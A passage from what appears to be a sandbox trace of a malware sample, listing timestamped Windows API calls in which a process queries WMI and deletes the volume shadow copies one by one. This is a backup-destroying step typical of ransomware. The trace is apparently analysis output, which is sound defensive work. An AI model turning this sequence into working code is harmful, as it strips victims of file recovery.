strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x82cc660, ppNamespace=0x17e840 | out: ppNamespace=0x17e840*=0x82ccfdc) returned 0x0 [0038.423] CoSetProxyBlanket (pProxy=0x82ccfdc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x3, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0038.423] IWbemServices:ExecQuery (in: This=0x82ccfdc, strQueryLanguage="", strQuery="", lFlags=48, pCtx=0x0, ppEnum=0x17e838 | out: ppEnum=0x17e838*=0x82cd07c) returned 0x0 [0038.431] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0039.922] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x40, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0039.922] lstrlenW (lpString="{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}") returned 38 [0039.922] GetProcessHeap () returned 0x280000 [0039.922] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0039.922] lstrlenW (lpString="{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}") returned 38 [0039.922] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'") returned 60 [0039.923] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0041.209] GetProcessHeap () returned 0x280000 [0041.209] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0041.209] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0041.209] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0041.212] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x3377d4, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{43A11862-374F-4B42-8013-C8A59B8690F4}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0041.212] lstrlenW (lpString="{43A11862-374F-4B42-8013-C8A59B8690F4}") returned 38 [0041.212] GetProcessHeap () returned 0x280000 [0041.212] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0041.212] lstrlenW (lpString="{43A11862-374F-4B42-8013-C8A59B8690F4}") returned 38 [0041.212] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'") returned 60 [0041.212] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{43A11862-374F-4B42-8013-C8A59B8690F4}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0042.120] GetProcessHeap () returned 0x280000 [0042.120] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0042.120] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0042.120] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0042.122] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e171c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{84D74FA3-DE98-47B0-806B-7C5805D67A02}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0042.122] lstrlenW (lpString="{84D74FA3-DE98-47B0-806B-7C5805D67A02}") returned 38 [0042.122] GetProcessHeap () returned 0x280000 [0042.122] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0042.122] lstrlenW (lpString="{84D74FA3-DE98-47B0-806B-7C5805D67A02}") returned 38 [0042.122] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'") returned 60 [0042.122] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{84D74FA3-DE98-47B0-806B-7C5805D67A02}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0043.276] GetProcessHeap () returned 0x280000 [0043.276] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0043.276] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0043.276] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0043.279] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e0c7c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{1D028705-A254-45DE-BE10-D22FA08DBB3A}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0043.279] lstrlenW (lpString="{1D028705-A254-45DE-BE10-D22FA08DBB3A}") returned 38 [0043.279] GetProcessHeap () returned 0x280000 [0043.279] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0043.279] lstrlenW (lpString="{1D028705-A254-45DE-BE10-D22FA08DBB3A}") returned 38 [0043.279] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'") returned 60 [0043.279] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{1D028705-A254-45DE-BE10-D22FA08DBB3A}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0044.257] GetProcessHeap () returned 0x280000 [0044.257] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0044.257] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0044.257] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0044.258] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e171c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{51FFEAE1-0810-4889-92A9-E72417EBFA41}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0044.258] lstrlenW (lpString="{51FFEAE1-0810-4889-92A9-E72417EBFA41}") returned 38 [0044.258] GetProcessHeap () returned 0x280000 [0044.259] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0044.259] lstrlenW (lpString="{51FFEAE1-0810-4889-92A9-E72417EBFA41}") returned 38 [0044.259] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'") returned 60 [0044.259] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{51FFEAE1-0810-4889-92A9-E72417EBFA41}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0045.089] GetProcessHeap () returned 0x280000 [0045.089] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0045.089] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0045.089] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0045.090] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e0c7c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0045.091] lstrlenW (lpString="{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}") returned 38 [0045.091] GetProcessHeap () returned 0x280000 [0045.091] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0045.091] lstrlenW (lpString="{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}") returned 38 [0045.091] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'") returned 60 [0045.091] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0045.979] GetProcessHeap () returned 0x280000 [0045.979] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0045.979] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0045.979] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0045.980] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e171c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0045.980] lstrlenW (lpString="{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}") returned 38 [0045.980] GetProcessHeap () returned 0x280000 [0045.980] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0045.980] lstrlenW (lpString="{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}") returned 38 [0045.980] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'") returned 60 [0045.981] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0046.841] GetProcessHeap () returned 0x280000 [0046.841] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0046.841] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0046.841] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0046.843] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e0c7c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{05121166-67F2-4EA9-83D8-EDC08F680DA7}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0046.843] lstrlenW (lpString="{05121166-67F2-4EA9-83D8-EDC08F680DA7}") returned 38 [0046.843] GetProcessHeap () returned 0x280000 [0046.843] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0046.843] lstrlenW (lpString="{05121166-67F2-4EA9-83D8-EDC08F680DA7}") returned 38 [0046.843] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'") returned 60 [0046.843] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0047.604] GetProcessHeap () returned 0x280000 [0047.604] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0047.604] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0047.604] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0047.607] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e171c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0047.607] lstrlenW (lpString="{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}") returned 38 [0047.607] GetProcessHeap () returned 0x280000 [0047.607] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0047.607] lstrlenW (lpString="{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}") returned 38 [0047.607] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'") returned 60 [0047.608] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0048.546] GetProcessHeap () returned 0x280000 [0048.546] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0048.546] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0048.546] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0048.548] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e0c7c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{7199C78C-6563-4398-B813-4A3F86995AEC}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0048.548] lstrlenW (lpString="{7199C78C-6563-4398-B813-4A3F86995AEC}") returned 38 [0048.548] GetProcessHeap () returned 0x280000 [0048.548] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0048.548] lstrlenW (lpString="{7199C78C-6563-4398-B813-4A3F86995AEC}") returned 38 [0048.548] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'") returned 60 [0048.548] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0049.403] GetProcessHeap () returned 0x280000 [0049.403] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0049.403] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0049.403] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0049.404] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e171c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{0F63D180-8A8A-41CF-8B3E-2852647AB192}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0049.404] lstrlenW (lpString="{0F63D180-8A8A-41CF-8B3E-2852647AB192}") returned 38 [0049.404] GetProcessHeap () returned 0x280000 [0049.404] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0049.404] lstrlenW (lpString="{0F63D180-8A8A-41CF-8B3E-2852647AB192}") returned 38 [0049.404] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'") returned 60 [0049.405] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0050.189] GetProcessHeap () returned 0x280000 [0050.189] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0050.189] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0050.189] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0050.191] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e0c7c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0050.191] lstrlenW (lpString="{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}") returned 38 [0050.191] GetProcessHeap () returned 0x280000 [0050.191] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0050.191] lstrlenW (lpString="{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}") returned 38 [0050.191] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'") returned 60 [0050.191] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0050.908] GetProcessHeap () returned 0x280000 [0050.908] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0050.908] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0050.908] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0050.909] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e171c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0050.909] lstrlenW (lpString="{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}") returned 38 [0050.909] GetProcessHeap () returned 0x280000 [0050.909] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0050.909] lstrlenW (lpString="{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}") returned 38 [0050.909] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'") returned 60 [0050.909] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0051.617] GetProcessHeap () returned 0x280000 [0051.617] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0051.617] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0051.617] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0051.619] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e0c7c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0051.619] lstrlenW (lpString="{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}") returned 38 [0051.619] GetProcessHeap () returned 0x280000 [0051.619] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0051.619] lstrlenW (lpString="{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}") returned 38 [0051.619] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'") returned 60 [0051.619] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0052.388] GetProcessHeap () returned 0x280000 [0052.388] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0052.388] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0052.388] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0052.391] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e171c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{1EE90775-4E53-4C29-811E-F4996057D94E}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0052.391] lstrlenW (lpString="{1EE90775-4E53-4C29-811E-F4996057D94E}") returned 38 [0052.391] GetProcessHeap () returned 0x280000 [0052.391] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x80) returned 0x2e0bf0 [0052.391] lstrlenW (lpString="{1EE90775-4E53-4C29-811E-F4996057D94E}") returned 38 [0052.391] wnsprintfW (in: pszDest=0x2e0bf0, cchDest=64, pszFmt="Win32_ShadowCopy.ID='%s'" | out: pszDest="Win32_ShadowCopy.ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'") returned 60 [0052.391] IWbemServices:DeleteInstance (in: This=0x82ccfdc, strObjectPath="Win32_ShadowCopy.ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'", lFlags=0, pCtx=0x82cc660, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0053.125] GetProcessHeap () returned 0x280000 [0053.125] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0053.125] IUnknown:Release (This=0x82cd0b8) returned 0x0 [0053.125] IEnumWbemClassObject:Next (in: This=0x82cd07c, lTimeout=-1, uCount=0x1, apObjects=0x17e834, puReturned=0x17e844 | out: apObjects=0x17e834*=0x82cd0b8, puReturned=0x17e844*=0x1) returned 0x0 [0053.126] IWbemClassObject:Get (in: This=0x82cd0b8, wszName="id", lFlags=0, pVal=0x17e820*(varType=0x0, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1=0x2e0c7c, varVal2=0x76c314dc), pType=0x0, plFlavor=0x0 | out: pVal=0x17e820*(varType=0x8, wReserved1=0x76c3, wReserved2=0xee68, wReserved3=0x29, varVal1="{DC780020-7243-4B55-80A9-4BA6EE67823B}", varVal2=0x76c314dc), pType=0x0, plFlavor=0x0) returned 0x0 [0053.126] lstrlenW (lpString="{DC780020-7243-4B55-80A9-4BA6EE67823B}") returned 38 